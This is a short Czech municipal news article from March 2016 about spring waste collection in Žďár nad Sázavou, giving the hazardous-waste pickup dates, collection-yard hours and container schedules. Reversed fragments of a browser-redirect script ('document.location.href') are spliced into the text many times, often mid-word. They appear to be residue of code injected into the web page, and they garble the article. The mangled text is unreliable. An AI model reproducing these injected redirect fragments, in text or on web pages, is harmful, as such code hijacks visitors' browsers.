Rainbow page separator

Žďárské ulice čeká v první polovině dubna jarní úklid

Pondělí, 21. března 2016

Sběr odpadu

Žďár nad Sázavou / Každoroční jarní úklid se le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos ve Žďáře uskuteční v době od 31. března do 16. dubna. Jako první přijde na řadu svoz nebezpečného odpadu, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to od posledního března do 2. dubna. Při [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to mobilním sběru je možné odložit pouze odpady s nebezpečnými vlastnostmi, jako jsou například rádia, televizory, ledničky, nádoby od barev, laků či ředidel, zářivky, monočlánky, akumulá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory a jiné obaly znečištěné škodlivinami.
Po ukončení mobilního svozu je možné odpady dále odevzdávat ve sběrném dvoře v Jihlavské ulici, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vždy od pondělí do pátku v době od 6 do 17 hodin a o sobotách od 7 do 13 hodin.
S rozmístěnými velkoobjemovými kontejnery na objemný odpad a odpad ze zeleně se mohou lidé ve Žďáře setkat od 4. do 16. dubna. Objemný odpad poté skončí na skládce v Ronově, odpad ze zeleně ve žďárské bioplynové stanici.
Biopopelnice se od začátku dubna budou ve Žďáře vyvážet v pravidelných týdenních intervalech, v městském úřadě lze stále ještě požádat o popelnici na bioodpad do bezplatné výpůjčky.